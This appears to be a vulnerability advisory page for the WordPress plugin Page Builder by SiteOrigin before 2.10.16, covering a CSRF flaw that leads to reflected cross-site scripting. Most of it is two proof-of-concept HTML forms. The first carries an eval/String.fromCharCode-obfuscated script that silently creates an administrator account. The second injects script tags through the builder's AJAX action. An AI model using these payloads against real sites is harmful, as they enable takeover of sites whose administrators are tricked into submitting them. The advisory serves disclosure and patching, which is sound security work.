Lucene search
Chloe ChamberlandWPEX-ID:6DE420D5-C1E6-40E4-AB30-DA0E974716B5HistoryMay 11, 2020 - 12:00 a.m.
Page Builder by SiteOrigin < 2.10.16 - CSRF to Reflected Cross-Site Scripting (XSS)
2020-05-1100:00:00
Chloe Chamberland
51
EPSS
0.001
Percentile
44.3%
Flaws in the live editor and action_builder_content functions of the plugin “allow attackers to forge requests on behalf of a site administrator and execute malicious code in the administrator’s browser. The attacker needs to trick a site administrator into executing an action, like clicking a link or an attachment, for the attack to succeed.”
Live Editor (will add new administrative user):
<html>
<body>
<form action="http://URL/hello-world/?siteorigin_panels_live_editor=true" method="POST">
<input type="hidden" name="live_editor_panels_data" value="{"widgets":[{"size":"medium","width":1920,"height":800,"caption":"","alt":"","link_type":"custom","link_url":"","image_classes":"","link_classes":"","link_rel":"","link_target_blank":false,"image_title":"","attachment_id":25467,"url":"http://element.vhx.cloud:8080/wp-content/uploads/2020/04/cropped-inner-pages-bg-300x125.jpg","title":"","so_sidebar_emulator_id":"media_image-2547910000","option_name":"widget_media_image","panels_info":{"class":"WP_Widget_Media_Image","raw":false,"grid":0,"cell":0,"id":0,"widget_id":"e94eb281-2fe6-424a-b74e-3c9613b9c24b","style":{"background_image_attachment":false,"background_display":"tile"}}},{"title":"","content":"<script>eval(String.fromCharCode(118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,114,101,113,117,101,115,116,85,82,76,61,34,47,119,112,45,97,100,109,105,110,47,117,115,101,114,45,110,101,119,46,112,104,112,34,44,110,111,110,99,101,82,101,103,101,120,61,47,115,101,114,34,32,118,97,108,117,101,61,34,40,91,94,34,93,42,63,41,34,47,103,59,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,71,69,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,49,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,41,59,118,97,114,32,110,111,110,99,101,77,97,116,99,104,61,110,111,110,99,101,82,101,103,101,120,46,101,120,101,99,40,97,106,97,120,82,101,113,117,101,115,116,46,114,101,115,112,111,110,115,101,84,101,120,116,41,44,110,111,110,99,101,61,110,111,110,99,101,77,97,116,99,104,91,49,93,44,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,97,116,116,97,99,107,101,114,38,101,109,97,105,108,61,97,116,116,97,99,107,101,114,64,115,105,116,101,46,99,111,109,38,112,97,115,115,49,61,97,116,116,97,99,107,101,114,38,112,97,115,115,50,61,97,116,116,97,99,107,101,114,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,40,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,41,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59))</script>","so_sidebar_emulator_id":"custom_html-2547910001","option_name":"widget_custom_html","panels_info":{"class":"WP_Widget_Custom_HTML","raw":false,"grid":0,"cell":0,"id":1,"widget_id":"8757c772-fbfb-4ad8-a5aa-5593bebf481c","style":{"background_image_attachment":false,"background_display":"tile"}}},{"title":"","content":"","so_sidebar_emulator_id":"custom_html-2547910002","option_name":"widget_custom_html","panels_info":{"class":"WP_Widget_Custom_HTML","raw":false,"grid":0,"cell":0,"id":2,"widget_id":"d7cce3cc-fdf7-41dd-abec-b37ef267f305","style":{"background_image_attachment":false,"background_display":"tile"}}}],"grids":[{"cells":1,"style":{"background_image_attachment":false,"background_display":"tile","cell_alignment":"flex-start"}}],"grid_cells":[{"grid":0,"index":0,"weight":1,"style":[]}]}" />
<input type="hidden" name="live_editor_post_ID" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
action_builder_content:
<html>
<body>
<form action="http://URL/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="so_panels_builder_content" />
<input type="hidden" name="panels_data" value="{"widgets":[{"title":"","count":0,"dropdown":0,"so_sidebar_emulator_id":"archives-2547910000","option_name":"widget_archives","panels_info":{"class":"WP_Widget_Archives","raw":false,"grid":0,"cell":0,"id":0,"widget_id":"67086774-af64-4963-9a29-c7a53b769d9e","style":{"background_image_attachment":false,"background_display":"tile"}}},{"title":"","panels_info":{"class":"WP_Widget_Categories","raw":true,"grid":0,"cell":0,"id":1,"widget_id":"39d0a609-f8ae-4666-91fa-2197bce23d84","style":{"id":"","class":"","widget_css":"","mobile_css":"","margin":"","padding":"","mobile_padding":"","background":"","background_image_attachment":"0","background_image_attachment_fallback":"","background_display":"tile","border_color":"","font_color":"","link_color":""}}},{"title":"","text":"[test <script>alert(0)</script>]\n\n&nbsp;\n\n[test&amp;#8221;&amp;gt;&amp;lt;script&amp;gt;alert(0)&amp;lt;/script&amp;gt;]","filter":"on","visual":"on","panels_info":{"class":"WP_Widget_Text","raw":true,"grid":0,"cell":0,"id":2,"widget_id":"93fd3358-c8b7-49b4-b9ee-7cb761968d43","style":{"id":"","class":"","widget_css":"","mobile_css":"","margin":"","padding":"","mobile_padding":"","background":"","background_image_attachment":"0","background_image_attachment_fallback":"","background_display":"tile","border_color":"","font_color":"","link_color":""}}}],"grids":[{"cells":1,"style":{"id":"","class":"","cell_class":"","row_css":"","mobile_css":"","bottom_margin":"","gutter":"","padding":"","row_stretch":"","collapse_behaviour":"","collapse_order":"","cell_alignment":"flex-start","mobile_bottom_margin":"","mobile_cell_margin":"","mobile_padding":"","background":"","background_image_attachment":"0","background_image_attachment_fallback":"","background_display":"tile","border_color":""}}],"grid_cells":[{"grid":0,"index":0,"weight":1,"style":[]}]}" />
<input type="hidden" name="post_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
openvas
openvas
wpvulndb
wpvulndb
prion
prion
Input validation
2020-05-28 04:15:00
Input validation
2020-05-28 04:15:00
patchstack
patchstack
WordPress Page Builder by SiteOrigin plugin <= 2.10.15 - Cross-Site Request Forgery (CSRF) vulnerability leading to Reflected Cross-Site Scripting (XSS)
2020-05-11 00:00:00
nvd
nvd
CVE-2020-13642
2020-05-28 04:15:12
CVE-2020-13643
2020-05-28 04:15:13
cvelist
cvelist
CVE-2020-13642
2020-05-28 03:11:57
CVE-2020-13643
2020-05-28 03:11:48
cve
cve
CVE-2020-13642
2020-05-28 04:15:12
CVE-2020-13643
2020-05-28 04:15:13